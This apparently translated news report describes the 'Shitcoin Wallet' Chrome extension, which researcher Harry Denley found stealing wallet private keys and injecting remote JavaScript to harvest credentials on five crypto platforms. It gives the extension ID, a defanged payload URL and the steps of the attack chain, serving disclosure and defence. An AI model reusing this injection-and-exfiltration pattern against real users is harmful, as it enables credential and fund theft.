A security researcher says that an extension on Google Chrome called "Shitcoin Wallet" steals passwords and saves users' private keys.
An add-on has been discovered running on Google Chrome that injects JavaScript code into web pages to steal passwords and private keys from cryptocurrency wallets and cryptocurrency payment gateways.
The extension is named "Shitcoin Wallet" (defined by the Chrome extension: ckkgmccefffnbbalkmbbgebbojjogffn), and it was launched last month, exactly December 9th.
According to the source, the Shitcoin Wallet add-on allows users to manage Ethereum (ETH) coins and also ERC20-based tokens. These tokens are usually issued by ICOs.
Users can install the Google Chrome extension and manage ETH coins and ERC20 tokens from within their browser, or they can install an application and the program on the desktop (currently supports Windows), if they wish to manage their money away from the browser.
To make users vulnerable to this malicious add-on on most platforms, whether from the browser or from the desktop.
Malicious extension detection and its breakdown:
Security researcher "Harry Denley", director of security in the MyCrypto platform, discovered that the extension contains malicious code.
According to Harry, the addition poses a risk to users in two ways.
First, any funds (ETH tokens and ERC20 based tokens) that are directly managed within the extension are at risk.
Harry says the extension sends the private keys of all wallets created or managed through its interface to a third-party website.
Second, the plugin also injects the malicious JavaScript code when users switch to five well-known and popular crypto management platforms.
This code steals the login credentials and private keys, which is the data that is sent to the “erc20wallet” site.
According to a security analysis of the malicious code, the process is as follows:
Users install the Google Chrome extension
The Google Chrome extension requires permission to inject JavaScript code to 77 websites [included here].
When users go to any of these 77 sites, the plugin downloads an additional JS file and input it from: https: // erc20wallet [.] Tk / js / content_.js
This JS file contains ambiguous code
The code is activated at five locations: MyEtherWallet.com, Idex.Market, Binance.org, NeoTracker.io, and Switcheo.exchange.
Once activated, the malicious JS code records the user's login credentials, searches for private keys stored within the dashboards of the five services, and finally, sends the data to erc20wallet.tk.
Until recently, the extension was available for download through the official Google Chrome extension store, with more than 625 downloads.
It is not clear if the "Shitcoin Wallet" team was responsible for the malicious code, or whether the Google Chrome extension was hacked by a third party.
